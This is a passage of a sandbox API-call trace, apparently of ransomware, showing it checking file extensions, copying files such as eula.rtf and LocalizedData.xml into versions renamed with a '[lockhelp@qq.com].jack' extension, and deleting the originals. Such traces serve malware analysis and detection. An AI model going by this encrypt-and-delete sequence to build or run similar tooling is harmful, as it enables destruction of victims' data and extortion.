(lpString=".xlsx") returned 5 [0197.459] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0197.459] lstrlenW (lpString=".ppt") returned 4 [0197.459] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0197.459] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 35 [0197.459] lstrlenW (lpString=".zip") returned 4 [0197.459] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0197.459] lstrlenW (lpString=".rar") returned 4 [0197.459] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0197.459] lstrlenW (lpString=".bz2") returned 4 [0197.459] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0197.459] lstrlenW (lpString=".7z") returned 3 [0197.459] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0197.459] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 35 [0197.459] lstrlenW (lpString=".dbf") returned 4 [0197.459] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0197.459] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 35 [0197.459] lstrlenW (lpString=".1cd") returned 4 [0197.459] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0197.459] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 35 [0197.459] lstrlenW (lpString=".jpg") returned 4 [0197.459] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0197.460] lstrcmpiW (lpString1=".rtf", lpString2=".jack") returned 1 [0197.460] lstrlenW (lpString="eula.rtf") returned 8 [0197.460] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc [0197.460] GetFileSizeEx (in: hFile=0x3fc, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=12687) returned 1 [0197.460] CloseHandle (hObject=0x3fc) returned 1 [0197.460] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1042\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf")) returned 0x80 [0197.460] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1042\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.460] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc [0197.460] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.460] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.461] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0197.461] GetLastError () returned 0x0 [0197.461] ReadFile (in: hFile=0x3fc, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x318f, lpOverlapped=0x0) returned 1 [0197.470] WriteFile (in: hFile=0x404, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x3190, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x3190, lpOverlapped=0x0) returned 1 [0197.471] ReadFile (in: hFile=0x3fc, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.471] WriteFile (in: hFile=0x404, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xe4, lpOverlapped=0x0) returned 1 [0197.471] SetEndOfFile (hFile=0x404) returned 1 [0197.472] CloseHandle (hObject=0x404) returned 1 [0197.473] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.473] SetEndOfFile (hFile=0x3fc) returned 1 [0197.474] CloseHandle (hObject=0x3fc) returned 1 [0197.474] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1042\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.474] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf")) returned 1 [0197.474] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 35 [0197.474] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 35 [0197.474] lstrlenW (lpString=".doc") returned 4 [0197.475] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0197.475] lstrlenW (lpString=".docx") returned 5 [0197.475] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0197.475] lstrlenW (lpString=".pdf") returned 4 [0197.475] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0197.475] lstrlenW (lpString=".xls") returned 4 [0197.475] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0197.475] lstrlenW (lpString=".xlsx") returned 5 [0197.475] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0197.475] lstrlenW (lpString=".ppt") returned 4 [0197.475] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0197.475] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 35 [0197.475] lstrlenW (lpString=".zip") returned 4 [0197.475] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0197.475] lstrlenW (lpString=".rar") returned 4 [0197.475] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0197.475] lstrlenW (lpString=".bz2") returned 4 [0197.475] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0197.475] lstrlenW (lpString=".7z") returned 3 [0197.475] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0197.475] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 35 [0197.475] lstrlenW (lpString=".dbf") returned 4 [0197.475] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0197.475] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 35 [0197.475] lstrlenW (lpString=".1cd") returned 4 [0197.475] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0197.475] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 35 [0197.475] lstrlenW (lpString=".jpg") returned 4 [0197.475] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0197.476] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 35 [0197.476] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 35 [0197.476] lstrlenW (lpString=".doc") returned 4 [0197.476] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0197.476] lstrlenW (lpString=".docx") returned 5 [0197.476] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0197.476] lstrlenW (lpString=".pdf") returned 4 [0197.476] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0197.476] lstrlenW (lpString=".xls") returned 4 [0197.476] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0197.476] lstrlenW (lpString=".xlsx") returned 5 [0197.476] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0197.476] lstrlenW (lpString=".ppt") returned 4 [0197.476] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0197.476] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 35 [0197.476] lstrlenW (lpString=".zip") returned 4 [0197.476] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0197.476] lstrlenW (lpString=".rar") returned 4 [0197.476] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0197.476] lstrlenW (lpString=".bz2") returned 4 [0197.476] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0197.476] lstrlenW (lpString=".7z") returned 3 [0197.476] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0197.476] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 35 [0197.476] lstrlenW (lpString=".dbf") returned 4 [0197.476] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0197.476] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 35 [0197.476] lstrlenW (lpString=".1cd") returned 4 [0197.476] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0197.476] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 35 [0197.477] lstrlenW (lpString=".jpg") returned 4 [0197.477] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0197.477] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0197.477] lstrlenW (lpString="LocalizedData.xml") returned 17 [0197.477] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc [0197.477] GetFileSizeEx (in: hFile=0x3fc, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=65238) returned 1 [0197.477] CloseHandle (hObject=0x3fc) returned 1 [0197.477] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml")) returned 0x80 [0197.477] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.477] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc [0197.477] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.478] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.478] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0197.478] GetLastError () returned 0x0 [0197.478] ReadFile (in: hFile=0x3fc, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0xfed6, lpOverlapped=0x0) returned 1 [0197.888] WriteFile (in: hFile=0x404, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xfee0, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xfee0, lpOverlapped=0x0) returned 1 [0197.890] ReadFile (in: hFile=0x3fc, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.890] WriteFile (in: hFile=0x404, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xf6, lpOverlapped=0x0) returned 1 [0197.890] SetEndOfFile (hFile=0x404) returned 1 [0197.891] CloseHandle (hObject=0x404) returned 1 [0197.893] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.893] SetEndOfFile (hFile=0x3fc) returned 1 [0197.894] CloseHandle (hObject=0x3fc) returned 1 [0197.894] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.894] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml")) returned 1 [0197.895] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 44 [0197.895] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 44 [0197.895] lstrlenW (lpString=".doc") returned 4 [0197.895] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0197.895] lstrlenW (lpString=".docx") returned 5 [0197.895] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0197.895] lstrlenW (lpString=".pdf") returned 4 [0197.895] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0197.895] lstrlenW (lpString=".xls") returned 4 [0197.895] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0197.895] lstrlenW (lpString=".xlsx") returned 5 [0197.895] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0197.895] lstrlenW (lpString=".ppt") returned 4 [0197.895] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0197.895] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 44 [0197.895] lstrlenW (lpString=".zip") returned 4 [0197.895] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0197.895] lstrlenW (lpString=".rar") returned 4 [0197.895] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0197.895] lstrlenW (lpString=".bz2") returned 4 [0197.895] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0197.895] lstrlenW (lpString=".7z") returned 3 [0197.896] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0197.896] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 44 [0197.896] lstrlenW (lpString=".dbf") returned 4 [0197.896] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0197.896] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 44 [0197.896] lstrlenW (lpString=".1cd") returned 4 [0197.896] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0197.896] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 44 [0197.896] lstrlenW (lpString=".jpg") returned 4 [0197.896] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0197.896] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 44 [0197.896] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 44 [0197.896] lstrlenW (lpString=".doc") returned 4 [0197.896] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0197.896] lstrlenW (lpString=".docx") returned 5 [0197.896] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0197.896] lstrlenW (lpString=".pdf") returned 4 [0197.896] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0197.896] lstrlenW (lpString=".xls") returned 4 [0197.896] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0197.896] lstrlenW (lpString=".xlsx") returned 5 [0197.896] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0197.896] lstrlenW (lpString=".ppt") returned 4 [0197.896] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0197.896] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 44 [0197.896] lstrlenW (lpString=".zip") returned 4 [0197.896] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0197.896] lstrlenW (lpString=".rar") returned 4 [0197.897] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0197.897] lstrlenW (lpString=".bz2") returned 4 [0197.897] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0197.897] lstrlenW (lpString=".7z") returned 3 [0197.897] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0197.897] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 44 [0197.897] lstrlenW (lpString=".dbf") returned 4 [0197.897] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0197.897] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 44 [0197.897] lstrlenW (lpString=".1cd") returned 4 [0197.897] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0197.897] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 44 [0197.897] lstrlenW (lpString=".jpg") returned 4 [0197.897] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0197.897] lstrcmpiW (lpString1=".rtf", lpString2=".jack") returned 1 [0197.897] lstrlenW (lpString="eula.rtf") returned 8 [0197.897] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc [0197.897] GetFileSizeEx (in: hFile=0x3fc, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=3865) returned 1 [0197.898] CloseHandle (hObject=0x3fc) returned 1 [0197.898] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1053\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf")) returned 0x80 [0197.898] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1053\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.898] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc [0197.898] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.898] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.898] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0197.898] GetLastError () returned 0x0 [0197.898] ReadFile (in: hFile=0x3fc, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0xf19, lpOverlapped=0x0) returned 1 [0197.900] WriteFile (in: hFile=0x404, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xf20, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xf20, lpOverlapped=0x0) returned 1 [0197.901] ReadFile (in: hFile=0x3fc, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.901] WriteFile (in: hFile=0x404, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xe4, lpOverlapped=0x0) returned 1 [0197.901] SetEndOfFile (hFile=0x404) returned 1 [0197.901] CloseHandle (hObject=0x404) returned 1 [0197.905] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.905] SetEndOfFile (hFile=0x3fc) returned 1 [0197.906] CloseHandle (hObject=0x3fc) returned 1 [0197.907] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1053\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.907] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf")) returned 1 [0197.907] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 35 [0197.907] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 35 [0197.907] lstrlenW (lpString=".doc") returned 4 [0197.907] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0197.908] lstrlenW (lpString=".docx") returned 5 [0197.908] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0197.908] lstrlenW (lpString=".pdf") returned 4 [0197.908] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0197.908] lstrlenW (lpString=".xls") returned 4 [0197.908] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0197.908] lstrlenW (lpString=".xlsx") returned 5 [0197.908] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0197.908] lstrlenW (lpString=".ppt") returned 4 [0197.908] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0197.908] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 35 [0197.908] lstrlenW (lpString=".zip") returned 4 [0197.908] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0197.908] lstrlenW (lpString=".rar") returned 4 [0197.908] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0197.908] lstrlenW (lpString=".bz2") returned 4 [0197.908] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0197.908] lstrlenW (lpString=".7z") returned 3 [0197.908] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0197.908] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 35 [0197.908] lstrlenW (lpString=".dbf") returned 4 [0197.908] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0197.908] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 35 [0197.908] lstrlenW (lpString=".1cd") returned 4 [0197.908] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0197.908] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 35 [0197.908] lstrlenW (lpString=".jpg") returned 4 [0197.908] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0197.909] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 35 [0197.909] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 35 [0197.909] lstrlenW (lpString=".doc") returned 4 [0197.909] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0197.909] lstrlenW (lpString=".docx") returned 5 [0197.909] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0197.909] lstrlenW (lpString=".pdf") returned 4 [0197.909] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0197.909] lstrlenW (lpString=".xls") returned 4 [0197.909] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0197.909] lstrlenW (lpString=".xlsx") returned 5 [0197.909] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0197.909] lstrlenW (lpString=".ppt") returned 4 [0197.909] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0197.909] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 35 [0197.909] lstrlenW (lpString=".zip") returned 4 [0197.909] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0197.909] lstrlenW (lpString=".rar") returned 4 [0197.909] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0197.909] lstrlenW (lpString=".bz2") returned 4 [0197.909] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0197.909] lstrlenW (lpString=".7z") returned 3 [0197.909] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0197.909] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 35 [0197.909] lstrlenW (lpString=".dbf") returned 4 [0197.909] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0197.909] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 35 [0197.909] lstrlenW (lpString=".1cd") returned 4 [0197.909] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0197.910] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 35 [0197.910] lstrlenW (lpString=".jpg") returned 4 [0197.910] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0197.910] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0197.910] lstrlenW (lpString="LocalizedData.xml") returned 17 [0197.910] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc [0197.910] GetFileSizeEx (in: hFile=0x3fc, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=77680) returned 1 [0197.910] CloseHandle (hObject=0x3fc) returned 1 [0197.910] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml")) returned 0x80 [0197.910] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.910] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc [0197.911] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: 